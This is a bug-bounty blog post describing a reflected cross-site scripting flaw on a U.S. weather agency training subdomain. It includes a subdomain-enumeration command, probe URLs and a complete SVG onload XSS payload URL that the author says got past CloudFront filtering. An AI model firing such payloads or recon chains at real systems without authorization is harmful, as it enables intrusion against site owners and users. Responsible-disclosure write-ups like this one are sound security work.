Bypassed the Amazon CloudFront Logic and got XSS at the National Weather Agency of the U.S.

Prince Roy(RoyzSec)
3 min readApr 11, 2024

--

Har Har Mahadev🔱. This is Prince roy, a security researcher also known as Royzsec. Back again with another blog about how I was able to bypass the Amazan Cloudfront firewall’s logic and get XSS [cross-site scripting]. Are you guys excited to know how I did it?

So, at first, I collected all the live subdomains of weather.gov via Subfinder and HTTPX.

subfinder -d weather.gov all | httpx -mc 200 | tee weather_live.txt

Bearly, I remember finding this XSS in the 9/10th subdomain. I lost that source code; otherwise, I could explain very easily what the logical error was in their CloudFront setting.

That was the domain [training.weather.gov]. I found the GET base RXSS on this page. When reading the source, they just used a lope where 1–6 PCU pages are showing. When I put :

https://training.weather.gov/pds/climate/index.php?unit=7

I found nothing on that page

Then tried to find out the SQL injection, but that didn’t work. Because they are using Amazon CloudFront.

Moreover, I also tried :

https://training.weather.gov/pds/climate/index.php?unit=1%22%3EHello
https://training.weather.gov/pds/climate/index.php?unit=2%22%3EHello
https://training.weather.gov/pds/climate/index.php?unit=6%22%3EHello
https://training.weather.gov/pds/climate/index.php?unit=7%22%3EHello

Until ?unit=6 was protected by Amazan CloudFront. But whenever I put unit=7, it bypasses the logic and is reflected on the screen.

I was shocked to see that because it was unexpected because it was just a logical error. Then I put in the XSS payload, and guess what?

https://training.weather.gov/pds/climate/index.php?unit=7%27%22%3E%3CSvg%20Only=1%20OnLoad=confirm(atob(%22WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgUm95elNlYw==%22))%3E&tab=FUZZ
BOOM!!!

Boom! Got XSS. It was just a logical error. The developer made the mistake of building logic to retrieve the data from the database. After 4 days they accepted my report as a valid.

Finally, thanks for reading my small blog. If you like this, please share it with your friends and press the clap button for me, which inspires me a lot.

Please follow my social media platforms:

Linkedin: https://www.linkedin.com/in/prince-roy-4b9a75187/

Github: https://github.com/royzsec

Twitter: https://twitter.com/royzsec

--

--